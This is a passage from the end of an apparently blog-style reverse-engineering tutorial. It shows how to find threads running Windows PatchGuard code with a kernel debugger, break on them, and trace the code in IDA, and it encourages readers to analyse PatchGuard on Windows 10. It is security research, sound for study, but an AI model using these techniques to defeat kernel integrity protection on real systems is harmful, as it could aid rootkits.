        ffffd001`043cd0b0 4c91448e`dcd4c0fd 0xffffe001`37ede587
        ffffd001`043cd0b8 00000000`00000000 0x4c91448e`dcd4c0fd
From this output, you can see that the thread 0x64 is calling KeDelayExecutionThread() from somewhere outside images. Obviously, it is not common unless you have malware in your system, especially considering the fact that the thread is a worker thread and even not a dedicated thread.

Once you find a thread like this, you are free to set a break point at the return address and get control with the debugger.
kd> u 0xffffe001`37ede587
ffffe001`37ede587 jmp     ffffe001`37ede5b5
ffffe001`37ede589 lea     rax,[rbp+1A8h]
ffffe001`37ede590 xor     r9d,r9d
ffffe001`37ede593 xor     r8d,r8d
ffffe001`37ede596 mov     qword ptr [rsp+20h],rax
ffffe001`37ede59b mov     rcx,r13
ffffe001`37ede59e call    qword ptr [rbp+68h]
ffffe001`37ede5a1 test    eax,eax
kd> bp 0xffffe001`37ede587
Image 11: Woohoo! Enjoy debugging.
This trick does not always work because PatchGuard sometimes skips sleep functions (KeDelayExecutionThread() or KeWaitForSingleObject()) and you do not catch the moment when a thread is executing code on memory, or PatchGuard sometimes runs inside of ntoskrn.exe and not on pool. But it is worth trying some times of reboot and checking if those threads exist.

Note that if you want to read code around the return address with IDA, you can search the byte sequence at the return address with [Alt-B].
kd> db 0xffffe001`37ede587 l10
ffffe001`37ede587  eb 2c 48 8d 85 a8 01 00-00 45 33 c9 45 33 c0 48  .,H......E3.E3.H

Image 12: Finding where the PatchGuard context is running in IDA 

Another option is using a hypervisor to monitor and detect PatchGuard threads based on execution of some uncommon instructions if the system is running on the Intel platform. See my PoC Sushi as an example.


We have seen how to locate functions, how to read 109 bug check parameters and how to discover threads running PatchGuard code. That is pretty much everything you need to know to get started. By now, you are ready for analyzing PatchGuard on Windows 10 where no one has ever succeeded in exploitation (at the time I wrote this article). All you have to do is just read code, name fields and functions, and test if your analysis is correct. That would not be anything special to us.

Special Thanks

Thank you very much @Myriachan for providing me many details about Windows RT and an opportunity to work on this fun project.